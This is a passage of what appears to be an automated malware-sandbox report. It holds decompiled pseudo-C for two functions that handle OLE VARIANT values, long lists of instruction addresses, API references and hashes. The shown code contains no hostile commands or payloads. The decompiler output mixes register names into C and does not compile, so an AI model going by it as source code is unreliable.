														 *(_t345 - 0x24) =  *(E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
														 *(_t345 - 0x2c) = 5;
														 *((char*)(_t345 - 4)) = 0xa;
														E0041A1FA(_t345 - 0x2c, _t345 + 0x3c, _t345 - 0x2c);
														_t203 = _t345 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)));
															 *(_t345 + 0x20) = 6;
															 *((intOrPtr*)(_t345 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t345 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t345 - 4)) = 0xd;
															E0041A1FA(_t345 + 0x20, _t345 + 0x3c, _t345 + 0x20);
															_t203 = _t345 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t345 - 0x64) =  *(E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
																 *(_t345 - 0x6c) = 7;
																 *((char*)(_t345 - 4)) = 0xc;
																E0041A1FA(_t345 - 0x6c, _t345 + 0x3c, _t345 - 0x6c);
																_t203 = _t345 - 0x6c;
																L30:
																 *((char*)(_t345 - 4)) = 0;
																 *_t344(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E0041A3B8(0,  *((intOrPtr*)(_t345 + 0x4c)), _t339, _t345 + 0x3c);
						 *_t344(_t345 + 0x3c);
					}
				} else {
					L4:
					E0041A3B8(0,  *((intOrPtr*)(_t345 + 0x4c)), _t339, _t345 + 0x3c);
					__imp__#9(_t345 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t345 - 0xc));
				_pop(_t340);
				_pop(_t343);
				_pop(_t281);
				return E0041D773( *((intOrPtr*)(_t345 + 0x4c)), _t281,  *(_t345 + 0x68) ^ _t345, _t337, _t340, _t343);
			}









































                                                                                                                            0x0041635f
                                                                                                                            0x0041635f
                                                                                                                            0x00416363
                                                                                                                            0x00416367
                                                                                                                            0x0041636e
                                                                                                                            0x00416371
                                                                                                                            0x0041637b
                                                                                                                            0x00416385
                                                                                                                            0x0041638a
                                                                                                                            0x0041638c
                                                                                                                            0x00416397
                                                                                                                            0x00416399
                                                                                                                            0x00416399
                                                                                                                            0x00416399
                                                                                                                            0x004163a8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004163ae
                                                                                                                            0x004163b8
                                                                                                                            0x004163c0
                                                                                                                            0x004163c3
                                                                                                                            0x004163c6
                                                                                                                            0x004163ce
                                                                                                                            0x004163f7
                                                                                                                            0x004163fc
                                                                                                                            0x004163fe
                                                                                                                            0x00000000
                                                                                                                            0x00416400
                                                                                                                            0x00416400
                                                                                                                            0x00416404
                                                                                                                            0x0041640f
                                                                                                                            0x00416411
                                                                                                                            0x0041666b
                                                                                                                            0x0041666b
                                                                                                                            0x00416670
                                                                                                                            0x00000000
                                                                                                                            0x00416676
                                                                                                                            0x00416676
                                                                                                                            0x00416676
                                                                                                                            0x00416677
                                                                                                                            0x004167af
                                                                                                                            0x004167b4
                                                                                                                            0x004167b6
                                                                                                                            0x004167bc
                                                                                                                            0x004167bf
                                                                                                                            0x004167c2
                                                                                                                            0x004167c4
                                                                                                                            0x004167c4
                                                                                                                            0x004167c4
                                                                                                                            0x004167c4
                                                                                                                            0x004167c7
                                                                                                                            0x004167c7
                                                                                                                            0x004167c4
                                                                                                                            0x004167cf
                                                                                                                            0x004167d2
                                                                                                                            0x004167d4
                                                                                                                            0x004167d4
                                                                                                                            0x004167d6
                                                                                                                            0x004167d9
                                                                                                                            0x004167e6
                                                                                                                            0x004167ea
                                                                                                                            0x004167ef
                                                                                                                            0x00000000
                                                                                                                            0x004167ef
                                                                                                                            0x0041667d
                                                                                                                            0x0041667e
                                                                                                                            0x0041667e
                                                                                                                            0x0041667f
                                                                                                                            0x00416758
                                                                                                                            0x0041675a
                                                                                                                            0x00416764
                                                                                                                            0x0041676a
                                                                                                                            0x0041676d
                                                                                                                            0x0041677a
                                                                                                                            0x0041677d
                                                                                                                            0x00416782
                                                                                                                            0x0041678b
                                                                                                                            0x00416795
                                                                                                                            0x00416799
                                                                                                                            0x0041679e
                                                                                                                            0x00000000
                                                                                                                            0x0041679e
                                                                                                                            0x00416685
                                                                                                                            0x00416685
                                                                                                                            0x00416685
                                                                                                                            0x00416686
                                                                                                                            0x004166fa
                                                                                                                            0x004166ff
                                                                                                                            0x00416701
                                                                                                                            0x0041670b
                                                                                                                            0x0041670e
                                                                                                                            0x0041671e
                                                                                                                            0x00416721
                                                                                                                            0x00416726
                                                                                                                            0x0041672f
                                                                                                                            0x00416739
                                                                                                                            0x0041673d
                                                                                                                            0x00416742
                                                                                                                            0x00000000
                                                                                                                            0x00416742
                                                                                                                            0x00416688
                                                                                                                            0x00416688
                                                                                                                            0x00416689
                                                                                                                            0x00416698
                                                                                                                            0x0041669d
                                                                                                                            0x0041669f
                                                                                                                            0x004166c9
                                                                                                                            0x004166ce
                                                                                                                            0x004166d6
                                                                                                                            0x004166e0
                                                                                                                            0x004166e4
                                                                                                                            0x004166e9
                                                                                                                            0x00000000
                                                                                                                            0x004166e9
                                                                                                                            0x0041669f
                                                                                                                            0x00416689
                                                                                                                            0x00416686
                                                                                                                            0x0041667f
                                                                                                                            0x00416677
                                                                                                                            0x00416417
                                                                                                                            0x00416417
                                                                                                                            0x00416634
                                                                                                                            0x00416644
                                                                                                                            0x00416648
                                                                                                                            0x00416651
                                                                                                                            0x00416655
                                                                                                                            0x00416661
                                                                                                                            0x00416663
                                                                                                                            0x00000000
                                                                                                                            0x0041641d
                                                                                                                            0x0041641d
                                                                                                                            0x00416420
                                                                                                                            0x0041650f
                                                                                                                            0x00416512
                                                                                                                            0x0041660c
                                                                                                                            0x00416615
                                                                                                                            0x00416619
                                                                                                                            0x0041661e
                                                                                                                            0x00000000
                                                                                                                            0x00416518
                                                                                                                            0x00416518
                                                                                                                            0x0041651b
                                                                                                                            0x004165d3
                                                                                                                            0x004165dc
                                                                                                                            0x004165e0
                                                                                                                            0x004165e5
                                                                                                                            0x00000000
                                                                                                                            0x00416521
                                                                                                                            0x00416521
                                                                                                                            0x00416524
                                                                                                                            0x0041652a
                                                                                                                            0x0041652d
                                                                                                                            0x0041659d
                                                                                                                            0x004165a4
                                                                                                                            0x004165aa
                                                                                                                            0x004165b4
                                                                                                                            0x004165b8
                                                                                                                            0x004165bd
                                                                                                                            0x00000000
                                                                                                                            0x0041652f
                                                                                                                            0x0041652f
                                                                                                                            0x00416532
                                                                                                                            0x00000000
                                                                                                                            0x00416534
                                                                                                                            0x00416534
                                                                                                                            0x00416537
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416537
                                                                                                                            0x00416532
                                                                                                                            0x0041652d
                                                                                                                            0x00416524
                                                                                                                            0x0041651b
                                                                                                                            0x00416426
                                                                                                                            0x00416426
                                                                                                                            0x004167f7
                                                                                                                            0x00416805
                                                                                                                            0x00416815
                                                                                                                            0x00416819
                                                                                                                            0x00416822
                                                                                                                            0x00416826
                                                                                                                            0x00416832
                                                                                                                            0x00416834
                                                                                                                            0x00416837
                                                                                                                            0x00416837
                                                                                                                            0x0041683a
                                                                                                                            0x0041683d
                                                                                                                            0x0041642c
                                                                                                                            0x0041642d
                                                                                                                            0x0041642d
                                                                                                                            0x0041642e
                                                                                                                            0x00416568
                                                                                                                            0x0041657e
                                                                                                                            0x00416587
                                                                                                                            0x0041658b
                                                                                                                            0x00416590
                                                                                                                            0x00000000
                                                                                                                            0x00416434
                                                                                                                            0x00416434
                                                                                                                            0x00416434
                                                                                                                            0x00416435
                                                                                                                            0x0041653d
                                                                                                                            0x0041654e
                                                                                                                            0x00416557
                                                                                                                            0x0041655b
                                                                                                                            0x00416560
                                                                                                                            0x00000000
                                                                                                                            0x0041643b
                                                                                                                            0x0041643b
                                                                                                                            0x0041643b
                                                                                                                            0x0041643c
                                                                                                                            0x004164e8
                                                                                                                            0x004164eb
                                                                                                                            0x004164f4
                                                                                                                            0x004164fe
                                                                                                                            0x00416502
                                                                                                                            0x00416507
                                                                                                                            0x00000000
                                                                                                                            0x00416442
                                                                                                                            0x00416442
                                                                                                                            0x00416442
                                                                                                                            0x00416443
                                                                                                                            0x004164bb
                                                                                                                            0x004164be
                                                                                                                            0x004164cb
                                                                                                                            0x004164cf
                                                                                                                            0x004164d4
                                                                                                                            0x00000000
                                                                                                                            0x00416445
                                                                                                                            0x00416445
                                                                                                                            0x00416445
                                                                                                                            0x00416446
                                                                                                                            0x00416481
                                                                                                                            0x0041648b
                                                                                                                            0x00416491
                                                                                                                            0x00416494
                                                                                                                            0x0041649e
                                                                                                                            0x004164a2
                                                                                                                            0x004164a7
                                                                                                                            0x00000000
                                                                                                                            0x00416448
                                                                                                                            0x00416448
                                                                                                                            0x00416449
                                                                                                                            0x0041645b
                                                                                                                            0x0041645e
                                                                                                                            0x0041646b
                                                                                                                            0x0041646f
                                                                                                                            0x00416474
                                                                                                                            0x004165eb
                                                                                                                            0x004165ec
                                                                                                                            0x004165ef
                                                                                                                            0x004165ef
                                                                                                                            0x00416449
                                                                                                                            0x00416446
                                                                                                                            0x00416443
                                                                                                                            0x0041643c
                                                                                                                            0x00416435
                                                                                                                            0x0041642e
                                                                                                                            0x00416426
                                                                                                                            0x00416420
                                                                                                                            0x00416417
                                                                                                                            0x00416849
                                                                                                                            0x00416852
                                                                                                                            0x00416852
                                                                                                                            0x004163d0
                                                                                                                            0x004163d0
                                                                                                                            0x004163d7
                                                                                                                            0x004163e0
                                                                                                                            0x004163e0
                                                                                                                            0x0041685a
                                                                                                                            0x00416862
                                                                                                                            0x00416863
                                                                                                                            0x00416864
                                                                                                                            0x00416873

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 0041637B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004163E0
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004165EF
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00416661
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00416852
                                                                                                                              • Part of subcall function 0041A1FA: VariantCopy.OLEAUT32(?,?), ref: 0041A208
                                                                                                                              • Part of subcall function 00403615: __EH_prolog3.LIBCMT ref: 0040361C
                                                                                                                              • Part of subcall function 0041A4B4: __EH_prolog3.LIBCMT ref: 0041A4BE
                                                                                                                              • Part of subcall function 0041A4B4: lstrlenA.KERNEL32(?,00000224,0041681E,?,00000008,00000000,?,000000CC), ref: 0041A4DD
                                                                                                                              • Part of subcall function 0041A4B4: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 0041A4E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$Clear$H_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1791476184-0
                                                                                                                            • Opcode ID: ce657773ec3d96032339ab235b5bb7da338c6aeea07f35626a9d10ab8805bdd2
                                                                                                                            • Instruction ID: e84d5f16a84bb587cf20f547a02306f2aadf2c55d37db7a4e3d5ea1ddb06727a
                                                                                                                            • Opcode Fuzzy Hash: ce657773ec3d96032339ab235b5bb7da338c6aeea07f35626a9d10ab8805bdd2
                                                                                                                            • Instruction Fuzzy Hash: 23F15B7150114CEADF15EFA4C850AFE7BB9AF08308F44805BFC5293291DB78DA89DB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041AD2D Relevance: 9.3, APIs: 6, Instructions: 253stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E0041AD2D(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E0041EA20(E00431F90, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E004070B9(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_t127 = E004013C0(_t185, __eflags,  *(_t191 + 8) << 4);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E00420CE0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E0041EC90(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E0041A526(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_t135 = E004013C0(_t185, __eflags, _t49);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E0041EA7C(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E00406890();
							goto L7;
						}
						E00420CE0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x435818;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E0041AA45(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E0041A8D7(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E0041A92D(_t195 - 0x58, _t185);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E00406890();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M0041B03D))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E0041A92D(_t179, _t185);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E00406890();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E0041CA54();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E0041CA54();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E0041CA54();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E0041CA54();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				if(E004013C0(_t185, _t201, _t19) != 0) {
					E00420CE0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E00403659(_t173, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}





























                                                                                                                            0x0041ad2d
                                                                                                                            0x0041ad2d
                                                                                                                            0x0041ad2d
                                                                                                                            0x0041ad34
                                                                                                                            0x0041ad39
                                                                                                                            0x0041ad42
                                                                                                                            0x0041ad47
                                                                                                                            0x0041ad4a
                                                                                                                            0x0041ad4d
                                                                                                                            0x0041ad51
                                                                                                                            0x0041ad54
                                                                                                                            0x0041ad58
                                                                                                                            0x0041ad5b
                                                                                                                            0x0041ad60
                                                                                                                            0x0041ad60
                                                                                                                            0x0041ad66
                                                                                                                            0x0041ad6c
                                                                                                                            0x0041ad70
                                                                                                                            0x0041ad75
                                                                                                                            0x0041ad7c
                                                                                                                            0x0041ad7f
                                                                                                                            0x0041adf3
                                                                                                                            0x0041adf3
                                                                                                                            0x0041adfd
                                                                                                                            0x0041ae02
                                                                                                                            0x0041ae04
                                                                                                                            0x0041ae05
                                                                                                                            0x0041ae16
                                                                                                                            0x0041ae19
                                                                                                                            0x0041ae1f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ae21
                                                                                                                            0x0041ae26
                                                                                                                            0x0041ae2b
                                                                                                                            0x0041ae2e
                                                                                                                            0x0041ae36
                                                                                                                            0x0041ae3b
                                                                                                                            0x0041ae49
                                                                                                                            0x0041ae4b
                                                                                                                            0x0041ae4b
                                                                                                                            0x0041ae4f
                                                                                                                            0x0041ae54
                                                                                                                            0x0041ae57
                                                                                                                            0x0041ad8f
                                                                                                                            0x0041ad8f
                                                                                                                            0x0041ad97
                                                                                                                            0x0041ada3
                                                                                                                            0x0041b030
                                                                                                                            0x0041b038
                                                                                                                            0x0041b038
                                                                                                                            0x0041ad99
                                                                                                                            0x0041ad9c
                                                                                                                            0x0041ad9e
                                                                                                                            0x0041ad9e
                                                                                                                            0x00000000
                                                                                                                            0x0041ad9e
                                                                                                                            0x0041ae5f
                                                                                                                            0x0041ae64
                                                                                                                            0x0041ae67
                                                                                                                            0x0041ae69
                                                                                                                            0x0041ae6b
                                                                                                                            0x0041ae72
                                                                                                                            0x0041ae75
                                                                                                                            0x0041ae78
                                                                                                                            0x0041ae7b
                                                                                                                            0x0041ae84
                                                                                                                            0x0041ae85
                                                                                                                            0x0041ae8b
                                                                                                                            0x0041ae8e
                                                                                                                            0x0041ae92
                                                                                                                            0x0041ae95
                                                                                                                            0x0041ae98
                                                                                                                            0x0041ae99
                                                                                                                            0x0041ae9c
                                                                                                                            0x0041ae9d
                                                                                                                            0x0041aea2
                                                                                                                            0x0041aea4
                                                                                                                            0x0041aea7
                                                                                                                            0x0041af02
                                                                                                                            0x0041af02
                                                                                                                            0x0041af05
                                                                                                                            0x0041af07
                                                                                                                            0x0041af0a
                                                                                                                            0x0041af25
                                                                                                                            0x0041af25
                                                                                                                            0x0041af29
                                                                                                                            0x0041af2c
                                                                                                                            0x0041af79
                                                                                                                            0x0041af7e
                                                                                                                            0x0041af81
                                                                                                                            0x0041af83
                                                                                                                            0x0041afdf
                                                                                                                            0x0041afdf
                                                                                                                            0x0041afe2
                                                                                                                            0x0041b008
                                                                                                                            0x0041b00e
                                                                                                                            0x0041b011
                                                                                                                            0x0041b015
                                                                                                                            0x0041b01a
                                                                                                                            0x0041b01e
                                                                                                                            0x0041b022
                                                                                                                            0x0041b024
                                                                                                                            0x0041b027
                                                                                                                            0x0041b029
                                                                                                                            0x0041b029
                                                                                                                            0x0041b02e
                                                                                                                            0x00000000
                                                                                                                            0x0041b02e
                                                                                                                            0x0041afe4
                                                                                                                            0x0041afe4
                                                                                                                            0x0041afe5
                                                                                                                            0x0041afef
                                                                                                                            0x0041afef
                                                                                                                            0x0041aff1
                                                                                                                            0x0041aff6
                                                                                                                            0x0041aff6
                                                                                                                            0x00000000
                                                                                                                            0x0041aff1
                                                                                                                            0x0041afe7
                                                                                                                            0x0041afe7
                                                                                                                            0x0041afea
                                                                                                                            0x0041afff
                                                                                                                            0x00000000
                                                                                                                            0x0041afff
                                                                                                                            0x0041afec
                                                                                                                            0x0041afed
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afed
                                                                                                                            0x0041af85
                                                                                                                            0x0041af88
                                                                                                                            0x0041af8e
                                                                                                                            0x0041af91
                                                                                                                            0x0041af94
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041af96
                                                                                                                            0x00000000
                                                                                                                            0x0041afc5
                                                                                                                            0x0041afc5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afd6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afb3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afbb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afa2
                                                                                                                            0x0041afa5
                                                                                                                            0x0041afa8
                                                                                                                            0x0041afab
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afc0
                                                                                                                            0x0041afc3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041afcb
                                                                                                                            0x0041afce
                                                                                                                            0x0041afd0
                                                                                                                            0x0041afd1
                                                                                                                            0x0041afd2
                                                                                                                            0x0041afd3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041af9d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041af96
                                                                                                                            0x0041af2e
                                                                                                                            0x0041af32
                                                                                                                            0x0041af37
                                                                                                                            0x0041af3b
                                                                                                                            0x0041af3f
                                                                                                                            0x0041af41
                                                                                                                            0x0041af44
                                                                                                                            0x0041af46
                                                                                                                            0x0041af46
                                                                                                                            0x00000000
                                                                                                                            0x0041af4b
                                                                                                                            0x0041af12
                                                                                                                            0x0041af15
                                                                                                                            0x0041af1b
                                                                                                                            0x0041af1f
                                                                                                                            0x0041af20
                                                                                                                            0x0041af20
                                                                                                                            0x00000000
                                                                                                                            0x0041af12
                                                                                                                            0x0041aea9
                                                                                                                            0x0041aead
                                                                                                                            0x0041aeb0
                                                                                                                            0x0041aeb1
                                                                                                                            0x0041aeb2
                                                                                                                            0x0041aeb5
                                                                                                                            0x0041aeb9
                                                                                                                            0x0041aeed
                                                                                                                            0x0041aef2
                                                                                                                            0x0041aef8
                                                                                                                            0x0041aefb
                                                                                                                            0x0041aefb
                                                                                                                            0x00000000
                                                                                                                            0x0041aefb
                                                                                                                            0x0041aebb
                                                                                                                            0x0041aebe
                                                                                                                            0x0041aee3
                                                                                                                            0x0041aee3
                                                                                                                            0x0041aee8
                                                                                                                            0x00000000
                                                                                                                            0x0041aee8
                                                                                                                            0x0041aec0
                                                                                                                            0x0041aec3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041aec8
                                                                                                                            0x0041aecb
                                                                                                                            0x0041aedf
                                                                                                                            0x0041aecd
                                                                                                                            0x0041aed2
                                                                                                                            0x0041aed5
                                                                                                                            0x0041aed5
                                                                                                                            0x00000000
                                                                                                                            0x0041aecb
                                                                                                                            0x0041ae07
                                                                                                                            0x0041ae07
                                                                                                                            0x0041ae0b
                                                                                                                            0x0041ae0e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ae10
                                                                                                                            0x0041ae13
                                                                                                                            0x00000000
                                                                                                                            0x0041ae13
                                                                                                                            0x0041ad81
                                                                                                                            0x0041ad81
                                                                                                                            0x0041ad8d
                                                                                                                            0x0041adaf
                                                                                                                            0x0041adb4
                                                                                                                            0x0041adb7
                                                                                                                            0x0041adbd
                                                                                                                            0x0041adc2
                                                                                                                            0x0041adc7
                                                                                                                            0x0041adcb
                                                                                                                            0x0041adce
                                                                                                                            0x0041add2
                                                                                                                            0x0041add5
                                                                                                                            0x0041add9
                                                                                                                            0x0041add9
                                                                                                                            0x0041adda
                                                                                                                            0x0041adde
                                                                                                                            0x0041ade2
                                                                                                                            0x0041ade3
                                                                                                                            0x0041ade6
                                                                                                                            0x0041adee
                                                                                                                            0x0041adf1
                                                                                                                            0x0041adf1
                                                                                                                            0x00000000
                                                                                                                            0x0041adf1
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0041AD34
